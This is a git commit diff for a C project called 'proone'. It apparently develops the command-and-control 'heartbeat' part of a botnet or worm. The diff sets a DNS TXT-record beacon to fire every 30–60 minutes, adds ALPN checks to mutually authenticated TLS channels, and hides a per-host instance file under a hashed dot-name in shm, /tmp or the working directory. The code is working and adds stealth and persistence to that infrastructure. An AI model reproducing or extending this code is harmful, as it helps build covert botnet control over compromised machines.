diff options
| author | David Timber <mieabby@gmail.com> | 2020-09-03 15:51:39 +0930 |
|---|---|---|
| committer | David Timber <mieabby@gmail.com> | 2020-09-03 15:52:28 +0930 |
| commit | 55f73d9c963cdd1ddda8741e178d0930b99e2eb8 (patch) | |
| tree | 95400f34e24b01b06e056635b7053565d6abd5e6 | |
| parent | e81c2636cee72af718e99fd98006fa9277de2a65 (diff) | |
* [proone] Use hashed value for shared global file
name
* [htbt] Verify ALPN
* [htbt] Bug fixes regarding poll()
* [htbt] Run w/o resolv
| -rw-r--r-- | .vscode/launch.json | 26 | ||||
| -rw-r--r-- | .vscode/tasks.json | 5 | ||||
| -rw-r--r-- | src/config.h | 1 | ||||
| -rw-r--r-- | src/data.h | 2 | ||||
| -rw-r--r-- | src/htbt.c | 91 | ||||
| -rw-r--r-- | src/mbedtls.c | 3 | ||||
| -rw-r--r-- | src/proone-htbthost.c | 21 | ||||
| -rw-r--r-- | src/proone-mkdvault.c | 4 | ||||
| -rw-r--r-- | src/proone.c | 302 | ||||
| -rw-r--r-- | src/protocol.h | 1 |
10 files changed, 321 insertions, 135 deletions
diff --git a/.vscode/launch.json b/.vscode/launch.json index b80310d..fe6bc48 100644 --- a/.vscode/launch.json +++ b/.vscode/launch.json @@ -44,6 +44,32 @@ "setupCommands": [], "preLaunchTask": "Build resolv", "miDebuggerPath": "/usr/bin/gdb" + }, + { + "name": "proone", + "type": "cppdbg", + "request": "launch", + "program": "${workspaceFolder}/src/proone", + "args": [], + "stopAtEntry": false, + "cwd": "${workspaceFolder}", + "environment": [], + "externalConsole": false, + "MIMode": "gdb", + "setupCommands": [ + { + "description": "Follow parent fork", + "text": "set follow-fork-mode parent", + "ignoreFailures": false + }, + { + "description": "Ignore SIGPIPE", + "text": "handle SIGPIPE nostop print", + "ignoreFailures": false + } + ], + "preLaunchTask": "Build proone", + "miDebuggerPath": "/usr/bin/gdb" } ] } diff --git a/.vscode/tasks.json b/.vscode/tasks.json index 00c792a..625efdb 100644 --- a/.vscode/tasks.json +++ b/.vscode/tasks.json @@ -34,6 +34,11 @@ "label": "Build resolv", "type": "shell", "command": "make -C ./src proone-resolv" + }, + { + "label": "Build proone", + "type": "shell", + "command": "make -C ./src proone" } ] } diff --git a/src/config.h b/src/config.h index bfcbc44..6206b63 100644 --- a/src/config.h +++ b/src/config.h @@ -15,4 +15,5 @@ #endif #define PRNE_PROG_VER { 0x11, 0xf7, 0x6b, 0x87, 0x62, 0x1a, 0x47, 0x9c, 0xa2, 0x18, 0x5c, 0x55, 0x40, 0x33, 0x7c, 0x9f } +#define PRNE_SHG_SALT { 0x31, 0xe4, 0xf1, 0x7c, 0xdb, 0x76, 0x43, 0x32, 0xaf, 0x48, 0xfd, 0x9f, 0xb8, 0x45, 0x3f, 0x8f } extern const prne_arch_t prne_host_arch; @@ -6,7 +6,7 @@ typedef enum { PRNE_DATA_KEY_NONE = -1, PRNE_DATA_KEY_PROG_VER, - PRNE_DATA_KEY_PROC_LIM_SHM, + PRNE_DATA_KEY_SHG_SALT, PRNE_DATA_KEY_X509_CA_CRT, PRNE_DATA_KEY_X509_DH, PRNE_DATA_KEY_X509_S_CRT, @@ -21,11 +21,9 @@ // Hover Max Redirection count #define HTBT_HOVER_MAX_REDIR 5 // CNCP interval: HTBT_CNCP_INT_MIN + variance -// #define HTBT_CNCP_INT_MIN 1800000 // half an hour minimum interval -// #define HTBT_CNCP_INT_VAR 1800000 // half an hour variance -// TODO -#define HTBT_CNCP_INT_MIN 59000 -#define HTBT_CNCP_INT_VAR 2000 +// between 30 minutes and an hour +#define HTBT_CNCP_INT_MIN 1800000 // half an hour minimum interval +#define HTBT_CNCP_INT_VAR 1800000 // half an hour variance #define HTBT_LBD_PORT prne_htobe16(PRNE_HTBT_PROTO_PORT) #define HTBT_LBD_BACKLOG 4 @@ -263,6 +261,28 @@ static void htbt_main_empty_req_q (prne_htbt_t *ctx) { prne_llist_clear(&ctx->main.req_q); } +static bool htbt_verify_alp ( + const mbedtls_ssl_config *conf, + const mbedtls_ssl_context *ctx) +{ + bool has_alpn = false; + + for (const char **a = conf->alpn_list; a != NULL && *a != NULL; a += 1) { + if (strcmp(*a, PRNE_HTBT_TLS_ALP) == 0) { + has_alpn = true; + break; + } + } + + if (!has_alpn) { + // ALP verification is disabled. + return true; + } + return prne_nstreq( + mbedtls_ssl_get_alpn_protocol(ctx), + PRNE_HTBT_TLS_ALP); +} + /* htbt_relay_child() */ static prne_htbt_status_code_t htbt_relay_child ( @@ -374,7 +394,7 @@ static prne_htbt_status_code_t htbt_relay_child ( } while (false); } - if (pfd[0].revents & POLLIN) { + if (pfd[0].revents) { f_ret = ctx->read_f( ctx->ioctx, ctx->iobuf[0].m + ctx->iobuf[0].len, @@ -397,7 +417,7 @@ static prne_htbt_status_code_t htbt_relay_child ( } } - if (pfd[1].revents & POLLOUT) { + if (pfd[1].revents) { f_ret = ctx->write_f( ctx->ioctx, ctx->iobuf[1].m, @@ -754,7 +774,7 @@ static void htbt_slv_consume_outbuf ( { break; } - if (fret == 1 && pfd.revents & POLLOUT) { + if (fret == 1 && pfd.revents) { fret = ctx->write_f( ctx->ioctx, ctx->iobuf[1].m, @@ -1088,7 +1108,7 @@ static bool htbt_slv_srv_bin ( goto SND_STATUS; } - if (pfd.revents & POLLIN) { + if (pfd.revents) { f_ret = ctx->read_f( ctx->ioctx, ctx->iobuf[0].m, @@ -1101,9 +1121,6 @@ static bool htbt_slv_srv_bin ( } prne_iobuf_shift(ctx->iobuf + 0, f_ret); } - else if (pfd.revents) { - goto END; - } } actual = prne_op_min(bin_meta.bin_size, ctx->iobuf[0].len); @@ -1373,10 +1390,10 @@ static void *htbt_slv_entry (void *p) { prne_pth_tstimeout(HTBT_SLV_SCK_OP_TIMEOUT)); prne_assert(ev_timeout != NULL); - if (pfd[1].revents & POLLOUT) { + if (pfd[1].revents) { htbt_slv_consume_outbuf(ctx, 0, ev_timeout); } - if (pfd[0].revents & POLLIN) { + if (pfd[0].revents) { if (ctx->iobuf[0].avail == 0) { prne_dbgpf("** Malicious client?\n"); ctx->valid = false; @@ -1547,6 +1564,10 @@ static bool htbt_main_slv_setup_f (void *ioctx, pth_event_t ev) { ret = false; goto END; } + if (!htbt_verify_alp(ctx->parent->param.main_ssl_conf, &ctx->ssl)) { + ret = false; + goto END; + } prne_dbgast(actual <= ctx->slv.iobuf[1].avail); ret = prne_htbt_ser_msg_head( @@ -1917,10 +1938,7 @@ static void htbt_cncp_stream_slv ( pth_mutex_release(&ctx->lock); f_ret = write(c.fd[1], trio.m, trio.len); - if (f_ret == 0 || - (f_ret < 0 && - (errno != EWOULDBLOCK && errno != EAGAIN))) - { + if (f_ret <= 0) { goto END; } prne_iobuf_shift(&trio, -f_ret); @@ -2026,11 +2044,6 @@ static void htbt_cncp_do_probe (prne_htbt_t *ctx) { &cv, prne_recmb_msb32(len[0], len[1], len[2], len[3])); } - else { - prne_dbgpf( - "* TXTREC resolv error: %s\n", - prne_resolv_qr_tostr(prm.fut->qr)); - } END: prne_memzero(ctx->cncp.txtrec, sizeof(ctx->cncp.txtrec)); @@ -2082,7 +2095,7 @@ static bool htbt_lbd_slv_setup_f (void *ioctx, pth_event_t ev) { &ctx->ssl, mbedtls_ssl_handshake, ctx->fd, - ev); + ev) && htbt_verify_alp(ctx->parent->param.lbd_ssl_conf, &ctx->ssl); } static void htbt_lbd_slv_cleanup_f (void *ioctx, pth_event_t ev) { @@ -2411,9 +2424,13 @@ static void free_htbt_wkr_ctx (void *p) { prne_free_llist(&ctx->main.req_q); prne_free_llist(&ctx->main.hover_req); - pth_abort(ctx->cncp.pth); + if (ctx->cncp.pth != NULL) { + pth_abort(ctx->cncp.pth); + } - pth_abort(ctx->lbd.pth); + if (ctx->lbd.pth != NULL) { + pth_abort(ctx->lbd.pth); + } prne_close(ctx->lbd.fd); htbt_lbd_empty_conn_list(ctx); prne_free_llist(&ctx->lbd.conn_list); @@ -2433,7 +2450,6 @@ prne_htbt_t *prne_alloc_htbt ( param.cncp_ssl_conf == NULL || param.main_ssl_conf == NULL || param.ctr_drbg == NULL || - param.resolv == NULL || param.blackhole < 0) { errno = EINVAL; @@ -2463,16 +2479,23 @@ prne_htbt_t *prne_alloc_htbt ( prne_init_llist(&ret->lbd.conn_list); ret->lbd.fd = -1; - ret->cncp.pth = pth_spawn( - PTH_ATTR_DEFAULT, - htbt_cncp_entry, - ret); - if (ret->cncp.pth == NULL || pth_suspend(ret->cncp.pth) == 0) { - goto ERR; + if (param.resolv != NULL) { + ret->cncp.pth = pth_spawn( + PTH_ATTR_DEFAULT, + htbt_cncp_entry, + ret); + if (ret->cncp.pth != NULL) { + pth_suspend(ret->cncp.pth); + } } ret->lbd.pth = pth_spawn(PTH_ATTR_DEFAULT, htbt_lbd_entry, ret); - if (ret->lbd.pth == NULL || pth_suspend(ret->lbd.pth) == 0) { + if (ret->lbd.pth != NULL) { + pth_suspend(ret->lbd.pth); + } + + if (ret->lbd.pth == NULL && ret->cncp.pth == NULL) { + // no producers. No point running main goto ERR; } diff --git a/src/mbedtls.c b/src/mbedtls.c index af5acf1..bda22c4 100644 --- a/src/mbedtls.c +++ b/src/mbedtls.c @@ -151,9 +151,6 @@ bool prne_mbedtls_pth_handle ( if (pollret == 0 || pth_event_status(ev) == PTH_STATUS_OCCURRED) { return false; } - if (pfd.revents & (POLLERR | POLLNVAL | POLLHUP)) { - return false; - } } while (false); } } diff --git a/src/proone-htbthost.c b/src/proone-htbthost.c index b4d8bdd..dbc53d6 100644 --- a/src/proone-htbthost.c +++ b/src/proone-htbthost.c @@ -138,6 +138,7 @@ static void load_ssl_conf ( mbedtls_pk_context *c_key, mbedtls_ctr_drbg_context *rnd) { + static const char *ALP_LIST[] = { PRNE_HTBT_TLS_ALP, NULL }; static const uint8_t CA_CRT[] = PRNE_X509_CA_CRT, S_CRT[] = PRNE_X509_S_CRT, @@ -178,6 +179,18 @@ static void load_ssl_conf ( mbedtls_ssl_conf_ca_chain(c_conf, ca, NULL); mbedtls_ssl_conf_verify(c_conf, prne_mbedtls_x509_crt_verify_cb, NULL); mbedtls_ssl_conf_rng(c_conf, mbedtls_ctr_drbg_random, rnd); + + if (htbthost_param.verify) { + assert( + mbedtls_ssl_conf_alpn_protocols(c_conf, ALP_LIST) == 0 && + mbedtls_ssl_conf_alpn_protocols(s_conf, ALP_LIST) == 0); + mbedtls_ssl_conf_authmode(c_conf, MBEDTLS_SSL_VERIFY_REQUIRED); + mbedtls_ssl_conf_authmode(s_conf, MBEDTLS_SSL_VERIFY_REQUIRED); + } + else { + mbedtls_ssl_conf_authmode(c_conf, MBEDTLS_SSL_VERIFY_NONE); + mbedtls_ssl_conf_authmode(s_conf, MBEDTLS_SSL_VERIFY_NONE); + } } static void mbedtls_dbg_f(void *ctx, int level, const char *filename, int line, const char *msg) { @@ -418,14 +431,6 @@ int main (const int argc, const char **args) { &ssl.c.crt, &ssl.c.key, &rnd); - mbedtls_ssl_conf_authmode( - &ssl.s.conf, - htbthost_param.verify ? - MBEDTLS_SSL_VERIFY_REQUIRED : MBEDTLS_SSL_VERIFY_NONE); - mbedtls_ssl_conf_authmode( - &ssl.c.conf, - htbthost_param.verify ? - MBEDTLS_SSL_VERIFY_REQUIRED : MBEDTLS_SSL_VERIFY_NONE); prne_assert(mbedtls_ssl_config_defaults( &ssl.cncp.conf, MBEDTLS_SSL_IS_CLIENT, diff --git a/src/proone-mkdvault.c b/src/proone-mkdvault.c index c42fb6a..6d423a9 100644 --- a/src/proone-mkdvault.c +++ b/src/proone-mkdvault.c @@ -140,9 +140,7 @@ int main (void) { pos += 256; add_bin(PRNE_DATA_KEY_PROG_VER, PRNE_PROG_VER); - add_cstr( - PRNE_DATA_KEY_PROC_LIM_SHM, - "/31e4f17c-db76-4332-af48-fd9fb8453f8f"); + add_bin(PRNE_DATA_KEY_SHG_SALT, PRNE_SHG_SALT); add_bin(PRNE_DATA_KEY_X509_CA_CRT, PRNE_X509_CA_CRT); add_bin(PRNE_DATA_KEY_X509_DH, PRNE_X509_DH); add_bin(PRNE_DATA_KEY_X509_S_CRT, PRNE_X509_S_CRT); diff --git a/src/proone.c b/src/proone.c index 2973aaf..baf8132 100644 --- a/src/proone.c +++ b/src/proone.c @@ -1,7 +1,6 @@ #include <stdbool.h> #include <stddef.h> #include <stdint.h> -#include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> @@ -17,6 +16,8 @@ #include <sys/wait.h> #include <elf.h> +#include <mbedtls/sha256.h> + #include "config.h" #include "proone.h" #include "protocol.h" @@ -315,6 +316,7 @@ static void load_ssl_conf (void) { prne_dbgpf("%s() returned %d\n", f, mret);\ break;\ } + static const char *ALP_LIST[] = { PRNE_HTBT_TLS_ALP, NULL }; size_t dvlen = 0; int mret; const uint8_t *data; @@ -324,52 +326,74 @@ static void load_ssl_conf (void) { mret = mbedtls_x509_crt_parse(&prne_g.ssl.ca, data, dvlen); BREAKIF_ERR("mbedtls_x509_crt_parse"); - // Server stuff - mret = mbedtls_ssl_config_defaults( - &prne_g.s_ssl.conf, - MBEDTLS_SSL_IS_SERVER, - MBEDTLS_SSL_TRANSPORT_STREAM, - MBEDTLS_SSL_PRESET_DEFAULT); - BREAKIF_ERR("mbedtls_ssl_config_defaults"); - data = prne_dvault_get_bin(PRNE_DATA_KEY_X509_S_CRT, &dvlen); - mret = mbedtls_x509_crt_parse(&prne_g.s_ssl.crt, data, dvlen); - BREAKIF_ERR("mbedtls_x509_crt_parse"); - data = prne_dvault_get_bin(PRNE_DATA_KEY_X509_S_KEY, &dvlen); - mret = mbedtls_pk_parse_key(&prne_g.s_ssl.pk, data, dvlen, NULL, 0); - BREAKIF_ERR("mbedtls_pk_parse_key"); - data = prne_dvault_get_bin(PRNE_DATA_KEY_X509_DH, &dvlen); - mret = mbedtls_dhm_parse_dhm(&prne_g.s_ssl.dhm, data, dvlen); - BREAKIF_ERR("mbedtls_dhm_parse_dhm"); - mret = mbedtls_ssl_conf_own_cert( - &prne_g.s_ssl.conf, - &prne_g.s_ssl.crt, - &prne_g.s_ssl.pk); - BREAKIF_ERR("mbedtls_ssl_conf_own_cert"); - mret = mbedtls_ssl_conf_dh_param_ctx( - &prne_g.s_ssl.conf, - &prne_g.s_ssl.dhm); - BREAKIF_ERR("mbedtls_ssl_conf_dh_param_ctx"); - prne_g.s_ssl.ready = true; - - // Client stuff - mret = mbedtls_ssl_config_defaults( - &prne_g.c_ssl.conf, - MBEDTLS_SSL_IS_SERVER, - MBEDTLS_SSL_TRANSPORT_STREAM, - MBEDTLS_SSL_PRESET_DEFAULT); - BREAKIF_ERR("mbedtls_ssl_config_defaults"); - data = prne_dvault_get_bin(PRNE_DATA_KEY_X509_C_CRT, &dvlen); - mret = mbedtls_x509_crt_parse(&prne_g.c_ssl.crt, data, dvlen); - BREAKIF_ERR("mbedtls_x509_crt_parse"); - data = prne_dvault_get_bin(PRNE_DATA_KEY_X509_C_KEY, &dvlen); - mret = mbedtls_pk_parse_key(&prne_g.c_ssl.pk, data, dvlen, NULL, 0); - BREAKIF_ERR("mbedtls_pk_parse_key"); - mret = mbedtls_ssl_conf_own_cert( - &prne_g.c_ssl.conf, - &prne_g.c_ssl.crt, - &prne_g.c_ssl.pk); - BREAKIF_ERR("mbedtls_ssl_conf_own_cert"); - prne_g.c_ssl.ready = true; + do { + // Server stuff + mret = mbedtls_ssl_config_defaults( + &prne_g.s_ssl.conf, + MBEDTLS_SSL_IS_SERVER, + MBEDTLS_SSL_TRANSPORT_STREAM, + MBEDTLS_SSL_PRESET_DEFAULT); + BREAKIF_ERR("mbedtls_ssl_config_defaults"); + data = prne_dvault_get_bin(PRNE_DATA_KEY_X509_S_CRT, &dvlen); + mret = mbedtls_x509_crt_parse(&prne_g.s_ssl.crt, data, dvlen); + BREAKIF_ERR("mbedtls_x509_crt_parse"); + data = prne_dvault_get_bin(PRNE_DATA_KEY_X509_S_KEY, &dvlen); + mret = mbedtls_pk_parse_key( + &prne_g.s_ssl.pk, + data, + dvlen, + NULL, + 0); + BREAKIF_ERR("mbedtls_pk_parse_key"); + data = prne_dvault_get_bin(PRNE_DATA_KEY_X509_DH, &dvlen); + mret = mbedtls_dhm_parse_dhm(&prne_g.s_ssl.dhm, data, dvlen); + BREAKIF_ERR("mbedtls_dhm_parse_dhm"); + mret = mbedtls_ssl_conf_own_cert( + &prne_g.s_ssl.conf, + &prne_g.s_ssl.crt, + &prne_g.s_ssl.pk); + BREAKIF_ERR("mbedtls_ssl_conf_own_cert"); + mret = mbedtls_ssl_conf_dh_param_ctx( + &prne_g.s_ssl.conf, + &prne_g.s_ssl.dhm); + BREAKIF_ERR("mbedtls_ssl_conf_dh_param_ctx"); + mret = mbedtls_ssl_conf_alpn_protocols( + &prne_g.s_ssl.conf, + ALP_LIST); + BREAKIF_ERR("mbedtls_ssl_conf_alpn_protocols"); + prne_g.s_ssl.ready = true; + } while (false); + + do { + // Client stuff + mret = mbedtls_ssl_config_defaults( + &prne_g.c_ssl.conf, + MBEDTLS_SSL_IS_SERVER, + MBEDTLS_SSL_TRANSPORT_STREAM, + MBEDTLS_SSL_PRESET_DEFAULT); + BREAKIF_ERR("mbedtls_ssl_config_defaults"); + data = prne_dvault_get_bin(PRNE_DATA_KEY_X509_C_CRT, &dvlen); + mret = mbedtls_x509_crt_parse(&prne_g.c_ssl.crt, data, dvlen); + BREAKIF_ERR("mbedtls_x509_crt_parse"); + data = prne_dvault_get_bin(PRNE_DATA_KEY_X509_C_KEY, &dvlen); + mret = mbedtls_pk_parse_key( + &prne_g.c_ssl.pk, + data, + dvlen, + NULL, + 0); + BREAKIF_ERR("mbedtls_pk_parse_key"); + mret = mbedtls_ssl_conf_own_cert( + &prne_g.c_ssl.conf, + &prne_g.c_ssl.crt, + &prne_g.c_ssl.pk); + BREAKIF_ERR("mbedtls_ssl_conf_own_cert"); + mret = mbedtls_ssl_conf_alpn_protocols( + &prne_g.c_ssl.conf, + ALP_LIST); + BREAKIF_ERR("mbedtls_ssl_conf_alpn_protocols"); + prne_g.c_ssl.ready = true; + } while (false); } while (false); prne_dvault_reset(); @@ -429,63 +453,165 @@ static bool format_shared_global (const int fd) { switch (rev) { // Future format update code goes here case 0: - if (lseek(fd, 0, SEEK_END) >= (off_t)sizeof(struct prne_shared_global)) { + return + lseek(fd, 0, SEEK_END) >= (off_t)sizeof(struct prne_shared_global); + } + + return false; +} + +static void skel_shared_global (struct prne_shared_global *skel) { + prne_memzero(skel, sizeof(skel)); + // Future code for new shared_global format goes here + skel->rev = 0; +} + +/* Hash following to get name for shared global backing file: +* The salt value "proone" +* Boot ID +* Hostname +* (In this order!) +* +* Note that the shared global is meant to be persistent only for current boot. +* It will be lost after the machine restart. +*/ +static void hash_shg_name (char *out) { + mbedtls_sha256_context h; + uint8_t m[32]; + size_t dv_len; + const uint8_t *dv_dat; + int fd = -1, f_ret; + + prne_memzero(m, sizeof(m)); + mbedtls_sha256_init(&h); + +// TRY + if (mbedtls_sha256_starts_ret(&h, 0) != 0) { + goto CATCH; + } + + dv_dat = prne_dvault_get_bin(PRNE_DATA_KEY_SHG_SALT, &dv_len); + if (mbedtls_sha256_update_ret(&h, dv_dat, dv_len) != 0) { + goto CATCH; + } + prne_dvault_reset(); + + if (mbedtls_sha256_update_ret(&h, prne_g.boot_id, 16) != 0) { + goto CATCH; + } + + fd = open("/etc/hostname", O_RDONLY); + if (fd >= 0) { + uint8_t buf[256]; + + f_ret = read(fd, buf, sizeof(buf)); + if (f_ret > 0) { + if (mbedtls_sha256_update_ret(&h, buf, f_ret) != 0) { + goto CATCH; + } + } + prne_close(fd); + fd = -1; + } + + mbedtls_sha256_finish_ret(&h, m); + +CATCH: + prne_dvault_reset(); + mbedtls_sha256_free(&h); + out[0] = '/'; + out[1] = '.'; + prne_uuid_tostr(m, out + 2); + out[38] = 0; + prne_close(fd); +} + +static bool try_open_sg (const char *path, const bool shm, int *ret) { + *ret = shm ? + shm_open(path, O_RDWR, 0600) : + open(path, O_RDWR, 0600); + if (*ret >= 0) { + if (!try_lock_file(*ret)) { + return false; + } + if (format_shared_global(*ret)) { return true; } - break; + else { + close(*ret); + *ret = -1; + } } - return false; + *ret = shm ? + shm_open(path, O_RDWR | O_CREAT | O_TRUNC, 0600) : + open(path, O_RDWR | O_CREAT | O_TRUNC, 0600); + if (*ret >= 0) { + struct prne_shared_global skel; + + skel_shared_global(&skel); + + if (!(try_lock_file(*ret) && + write(*ret, &skel, sizeof(skel)) == sizeof(skel))) + { + close(*ret); + *ret = -1; + } + } + + return true; } +/* init_shared_global () +* +* Returns true if there's no other process detected. Returns false otherwise +* to indicate that the program should not progress further. +*/ static bool init_shared_global (void) { - int fd; - const char *fname; + int fd = -1; + char fname[39]; + char path[38 + prne_op_max(sizeof("/tmp"), sizeof("."))]; bool ret = true; - /* TODO - * 3. Try creating and opening /tmp/... - * 4. Try creating and opening random file in current wd - * 5. ... just don't use shared memory if all of these fail + /* + * 1. Try creating shm, which is the most favourable + * 2. Try creating a file in /tmp, which is memory backed on most env + * 3. Try creating a file in current wd + * + * ... just don't use shared memory if all of these fail */ + hash_shg_name(fname); - fname = prne_dvault_get_cstr(PRNE_DATA_KEY_PROC_LIM_SHM, NULL); do { - fd = shm_open(fname, O_RDWR, 0600); + ret = try_open_sg(fname, true, &fd); + if (!ret) { + goto END; + } if (fd >= 0) { - if (!try_lock_file(fd)) { - ret = false; - goto END; - } - if (format_shared_global(fd)) { - break; - } - else { - prne_close(fd); - fd = -1; - } + break; } - fd = shm_open(fname, O_RDWR | O_CREAT | O_TRUNC, 0600); + strcpy(path, "/tmp"); + strcat(path, fname); + ret = try_open_sg(path, false, &fd); + if (!ret) { + goto END; + } if (fd >= 0) { - struct prne_shared_global skel; - - if (!try_lock_file(fd)) { - ret = false; - goto END; - } - - prne_memzero(&skel, sizeof(skel)); - // Future code for new shared_global format goes here - skel.rev = 0; - - if (write(fd, &skel, sizeof(skel)) != sizeof(skel)) { - goto END; - } + break; } - else { + + strcpy(path, "."); + strcat(path, fname); + ret = try_open_sg(path, false, &fd); + if (!ret) { goto END; } + if (fd >= 0) { + break; + } + + goto END; } while (false); prne_s_g = (struct prne_shared_global*)mmap( @@ -523,7 +649,11 @@ static void init_ids (void) { char line[37]; int fd = -1; - if (mbedtls_ctr_drbg_random(&prne_g.ssl.rnd, prne_g.instance_id, sizeof(prne_g.instance_id)) != 0) { + if (mbedtls_ctr_drbg_random( + &prne_g.ssl.rnd, + prne_g.instance_id, + sizeof(prne_g.instance_id)) != 0) + { prne_memzero(prne_g.instance_id, sizeof(prne_g.instance_id)); } diff --git a/src/protocol.h b/src/protocol.h index 0f2beeb..c38a459 100644 --- a/src/protocol.h +++ b/src/protocol.h @@ -258,6 +258,7 @@ typedef bool(*prne_htbt_eq_ft)(const void *a, const void *b); typedef prne_htbt_ser_rc_t(*prne_htbt_ser_ft)(uint8_t *mem, const size_t mem_len, size_t *actual, const void *in); typedef prne_htbt_ser_rc_t(*prne_htbt_dser_ft)(const uint8_t *data, const size_t len, size_t *actual, void *out); +#define PRNE_HTBT_TLS_ALP "prne-htbt" #define PRNE_HTBT_MSG_ID_MIN 1 #define PRNE_HTBT_MSG_ID_MAX INT16_MAX #define PRNE_HTBT_MSG_ID_DELTA INT16_MAX |